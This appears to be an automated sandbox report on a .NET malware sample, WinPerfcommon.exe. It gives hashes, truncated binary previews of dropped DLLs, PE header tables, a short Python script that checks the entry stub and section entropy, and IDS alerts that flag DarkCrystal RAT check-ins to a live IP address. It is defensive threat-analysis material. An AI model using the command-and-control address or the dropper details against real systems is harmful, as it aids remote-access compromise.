                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (620), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):620
                                                                                    Entropy (8bit):5.891892775832668
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:lcOwU+fWo0jdGVd+LigbKISHgy3fFTJMiFXaMXIO4oTElD:wwjdOd+Lig+bLfbxpXI7oTy
                                                                                    MD5:2F8071B923195D53E1FD903803C22749
                                                                                    SHA1:C2DBD0ADA90BF37E3C9C19E84C077E65B2804ECA
                                                                                    SHA-256:0E451FA05115D545A96D4A35E8F32CC2D61DBF924EBB66B5E22DE065423F6687
                                                                                    SHA-512:BF4F8F13D4C3831023CD96705DF16A112BD4A19B898317BC478FF011ACBE926CB9B2D4368E610D2FF1B23C44BF3760FA3AD4B6954170F2BA73F032E54ADDEDA4
                                                                                    Malicious:false
Preview:
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):1224
                                                                                    Entropy (8bit):4.435108676655666
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.947885190858609
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6oJbPtPaM7Jt8Bs3FJsdcV4MKe27FdcxMl0vqBH+OulajfqXSfbNtm:DPpHPc+Vx9ME6qvkYcjRzNt
                                                                                    MD5:213697101D4B7469F0BECF05AB8508E7
                                                                                    SHA1:205DD4C5D83561B9E46AE43B297D515CCA403031
                                                                                    SHA-256:537B2CEA1001E15164C7E239CDD978BDB1E85A0B5ACC9D53AAFB32D00F8043DC
                                                                                    SHA-512:7B0C4218F90214A699881F5A988C2E535005DBA6D94A89DB981427702070EFD954EA52B862A08DA65C434B7D20530B7406D413297C95ECD93053B668C1764C5E
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..4.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):502
                                                                                    Entropy (8bit):4.613979319612254
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Pkl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:sfdUOAokItULVDv
                                                                                    MD5:032C705D3EE087290604BFC8E0242F88
                                                                                    SHA1:E7CB57DE13AC98A3C8735758A1C4294DB66543E5
                                                                                    SHA-256:6160273CADF8F850FB0EA0A535C233596D736ED11EFDF4FC1E09F687C46B64E2
                                                                                    SHA-512:EDE27B27A72F86E8F1AB727BED2CD1335BF1A8675B3ABE2B6D896999B3A8265905446F612BC7F86F2CC8C1B0585092BC74B36F5838809C85419A0A34CC6CDEE6
                                                                                    Malicious:false
                                                                                    Preview:..Pinging 066656 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    File name:WinPerfcommon.exe
                                                                                    File size:2'020'864 bytes
                                                                                    MD5:6b9554367a439d39a00a0dff9a08b123
                                                                                    SHA1:e1d22cde90c297c10f4fcba5b3980e5d551eb0b3
                                                                                    SHA256:3332277b9e53375e998ccf981cdb0519fea7721b5e79a3d7a60b83f448f6c0a9
                                                                                    SHA512:72ffbca1a2aa7cd2bb6b963d97b43d7d5eab9a11d09c647c7679e71877927b8c021e28cd1e28ae9ac5300c8621ba97aae6699e1abddc58be89c9bb3e84d1c720
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    TLSH:5395BF5A25924F32C3A0AB358157423DA2D0DB263516FF1B7A5F28D26807BF19B731B3
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@................................
                                                                                    Icon Hash:90cececece8e8eb0
                                                                                    Entrypoint:0x5eebfe
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x66928524 [Sat Jul 13 13:46:12 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the bytes after the 6-byte `jmp dword ptr [imm32]` stub are zero padding, which a linear disassembler renders as `add byte ptr [eax], al`)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1eebb0         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1f0000         0x320         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1f2000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x1ecc04      0x1ece00  4a8675ff3c7d1af2d38102a78d437264  False     0.7899615418146082  data       7.574103435922908    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x1f0000         0x320         0x400     6600cbb6a430800013f2a673f3431cd2  False     0.349609375         data       2.6430868172484443   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x1f2000         0xc           0x200     4dfdac8bbb6897800d8c24f5bfaf0990  False     0.041015625         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        RVA       Size   Type  Language  Country  ZLIB Complexity
RT_VERSION  0x1f0058  0x2c8  data                     0.46207865168539325
DLL          Import
mscoree.dll  _CorExeMain
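The header values above describe the usual shape of a managed (.NET) executable: a six-byte `jmp dword ptr [00402000h]` at the entry point that goes through the single IAT slot to `mscoree!_CorExeMain`, a CLR header in the COM descriptor directory, and a `.text` section whose entropy (7.57) is far above what plain metadata and IL produce. The following script is an added example, not part of the Joe Sandbox report, that applies those checks to the values copied from the tables above using only the Python standard library. Two things are assumptions and are labelled as such in the code: the stub bytes `FF 25 00 20 40 00` are the standard x86 encoding of the instruction the report disassembles (the report shows the mnemonic, not the bytes), and the 7.0 entropy threshold is a common triage heuristic rather than a value from the report.

```python
"""Added example (not from the Joe Sandbox report): sanity-check the managed
entry stub and section layout of WinPerfcommon.exe from the header values the
report lists, standard library only."""
import struct

IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x5EEBFE          # "Entrypoint" in the report is a virtual address

# Section table copied from the report: name -> (VirtualAddress, VirtualSize, RawSize, entropy)
SECTIONS = {
    ".text":  (0x2000,   0x1ECC04, 0x1ECE00, 7.574103435922908),
    ".rsrc":  (0x1F0000, 0x320,    0x400,    2.6430868172484443),
    ".reloc": (0x1F2000, 0xC,      0x200,    0.08153941234324169),
}

# Data directories copied from the report: name -> (RVA, size)
DIRECTORIES = {
    "IMPORT":         (0x1EEBB0, 0x4B),
    "RESOURCE":       (0x1F0000, 0x320),
    "BASERELOC":      (0x1F2000, 0xC),
    "IAT":            (0x2000,   0x8),
    "COM_DESCRIPTOR": (0x2008,   0x48),
    "SECURITY":       (0x0,      0x0),
    "DEBUG":          (0x0,      0x0),
}

IMPORTS = {"mscoree.dll": ["_CorExeMain"]}

# ASSUMED bytes at the entry point: `jmp dword ptr [00402000h]` is encoded as
# FF 25 <imm32>, the imm32 being the absolute address of the IAT slot read through.
ENTRY_STUB = bytes.fromhex("FF25 0020 4000")


def rva_to_section(rva):
    """Name of the section whose virtual range contains rva, or None."""
    for name, (va, vsize, raw_size, _) in SECTIONS.items():
        # the mapped extent is the larger of VirtualSize and RawSize
        if va <= rva < va + max(vsize, raw_size):
            return name
    return None


def decode_jmp_indirect(stub):
    """Decode `FF 25 imm32` (jmp dword ptr [imm32]) and return the address
    that is read through, or None if the bytes are some other instruction."""
    if len(stub) < 6 or stub[0] != 0xFF or stub[1] != 0x25:
        return None
    return struct.unpack_from("<I", stub, 2)[0]


def managed_entry_stub_checks():
    """The checks a reverser runs before opening a .NET sample in a decompiler.
    Every value should be True for an ordinary managed exe."""
    entry_rva = ENTRYPOINT_VA - IMAGE_BASE           # 0x1EEBFE
    iat_rva, iat_size = DIRECTORIES["IAT"]
    target_va = decode_jmp_indirect(ENTRY_STUB)
    return {
        # the entry point has to sit in the executable section
        "entry_in_text": rva_to_section(entry_rva) == ".text",
        # the stub jumps through the IAT slot ...
        "stub_targets_iat": target_va == IMAGE_BASE + iat_rva,
        # ... and an 8-byte IAT is exactly one 32-bit thunk plus its terminator
        "single_thunk_iat": iat_size == 8,
        # a CLR header (COM descriptor, 0x48 bytes) is what makes the image managed
        "has_clr_header": DIRECTORIES["COM_DESCRIPTOR"][1] == 0x48,
        # the only native import a plain .NET exe needs is mscoree!_CorExeMain
        "only_corexemain": IMPORTS == {"mscoree.dll": ["_CorExeMain"]},
        # no Authenticode blob and no debug directory: nothing to pivot on
        "unsigned_no_debug": DIRECTORIES["SECURITY"] == (0, 0)
                             and DIRECTORIES["DEBUG"] == (0, 0),
    }


def high_entropy_sections(threshold=7.0):
    """Sections above an ASSUMED entropy threshold. In a managed exe this is a
    strong hint that the IL wraps an encrypted or compressed payload."""
    return [name for name, (_, _, _, ent) in SECTIONS.items() if ent > threshold]


if __name__ == "__main__":
    for check, ok in managed_entry_stub_checks().items():
        print(f"{check:20s} {ok}")
    print("high-entropy sections:", high_entropy_sections())
```

Every check comes back True for this sample, which is the point: the native PE layer is an unremarkable .NET shell, and the 2 MB high-entropy `.text` is where the analysis has to continue (the report's string-decryption and PureLog/zgRAT detections are consistent with an encrypted payload inside the IL).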
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T16:20:13.961527+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | TCP
2025-01-11T16:20:26.445916+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49737 | 37.44.238.250 | 80 | TCP
2025-01-11T16:20:52.946036+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62175 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:01.242843+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62196 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:05.430363+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62218 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:11.211605+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62254 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:14.045793+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62270 | 37.44.238.250 | 80 | TCP
